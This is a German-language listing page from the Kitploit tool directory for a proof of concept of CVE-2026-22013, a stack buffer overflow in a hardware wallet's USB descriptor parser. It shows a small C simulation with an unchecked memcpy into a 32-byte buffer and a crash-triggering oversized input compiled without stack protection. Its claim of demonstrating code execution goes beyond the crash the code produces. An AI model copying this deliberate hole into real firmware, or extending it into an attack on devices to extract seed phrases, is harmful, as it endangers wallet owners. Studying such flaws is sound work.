Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow — Stack-Buffer-Overflow-PoC für einen USB-Deskriptor-Parser einer Hardware-Wallet (CVE-2026-22013), der das Überschreiben der Rücksprungadresse und die Codeausführung über eine überdimensionierte GET_DESCRIPTOR-Payload demonstriert. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow
Embedded-System-SicherheitSchwachstellenanalyseExploitationHardware-HackingHardware-SicherheitBinary-Exploitation
GitHubgeorge0papasotiriou/cve-2026-22013-hardware-wallet-usb-descriptor-buffer-overflow

CVE-2026-22013-Hardware-Wallet-USB-Descriptor-Buffer-Overflow

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Stack-Buffer-Overflow-PoC für einen USB-Deskriptor-Parser einer Hardware-Wallet (CVE-2026-22013), der das Überschreiben der Rücksprungadresse und die Codeausführung über eine überdimensionierte GET_DESCRIPTOR-Payload demonstriert.

Repository anzeigen
5vor 1 MonatNoch nicht geprüft

CVE-2026-22013 – Pufferüberlauf im USB-Deskriptor einer Hardware-Wallet

Programmcode (C-Firmware-Simulation)

root@kitploit:~
// hw_wallet_usb.c - USB descriptor parsing with fixed buffer
#include <string.h>
void handle_usb_setup(char *data, int len) {
    char descriptor[32];
    if (len > 0 && data[0] == 0x06) { // GET_DESCRIPTOR
        // Copy descriptor payload without bounds check
        memcpy(descriptor, data+1, len-1);  // overflow if len>33
    }
}
int main() {
    char malicious[64];
    memset(malicious, 'A', 63);
    malicious[0] = 0x06;
    handle_usb_setup(malicious, 64);
    return 0;
}

CVE-2026-22013 – Pufferüberlauf im USB-Deskriptor einer Hardware-Wallet

Severity: Critical

Überblick

Der USB-Stack einer Hardware-Wallet weist einen Stack-Pufferüberlauf beim Parsen einer GET_DESCRIPTOR-Anfrage mit einer übermäßig großen Nutzlast auf. Ein Angreifer mit physischem USB-Zugriff kann dies ausnutzen, um die Rücksprungadresse zu überschreiben und Codeausführung zu erlangen, wodurch Seed-Phrasen extrahiert werden können.

Details zur Schwachstelle

  • Typ: Stack-Pufferüberlauf
  • Auswirkung: Vollständige Kompromittierung des Geräts, Extraktion der Seed-Phrase.
  • Grundursache: Das Feld für die Deskriptorlänge wird vor dem Kopieren in einen Puffer fester Größe nicht validiert.

Exploit-Demonstration

Für die Zielarchitektur kompilieren und ausführen (Simulation):

root@kitploit:~
gcc -o hw_wallet_usb hw_wallet_usb.c -fno-stack-protector
./hw_wallet_usb

Das Programm stürzt aufgrund der Stack-Korruption ab.

Tool herunterladen